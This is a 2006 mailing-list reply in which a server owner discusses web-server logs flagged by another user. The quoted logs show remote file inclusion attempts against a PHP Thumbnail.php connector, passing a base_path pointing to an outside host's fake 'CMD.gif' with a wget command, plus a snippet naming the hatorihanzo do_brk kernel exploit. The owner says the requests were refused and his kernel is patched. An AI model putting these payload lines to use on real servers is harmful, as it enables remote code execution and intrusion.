Re: ***DEB*: Re: help needed

[Bjoern Boschman <bjoern@boschman.de>]

Hi Fuzzums,

Fuzzums schrieb:
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET 
> http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget 
> HTTP/1.0" 403 495 
> "http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"; 
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET 
> http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget 
> HTTP/1.0" 403 499 
> "http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"; 
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>
> http://213.202.214.106/CMD.gif isn't a gif.
>
> [snip]
>
> if ($kernel == "write") {
>    $kernel = "/*\n" .
>              " * hatorihanzo.c\n" .
>              " * Linux kernel do_brk vma overflow exploit.\n" .
> [/snip]


but those attemds to access any /manager/ or /cms/ whatever URLs all got 
an 403 forbidden and are non-existing on my box.

the kernel I'm running is sarge latest 2.6.8-16sarge5 which shouldn't be 
vulnerable to that do_brk exploit.

thank you anyhow for digging into my logs

Bjoern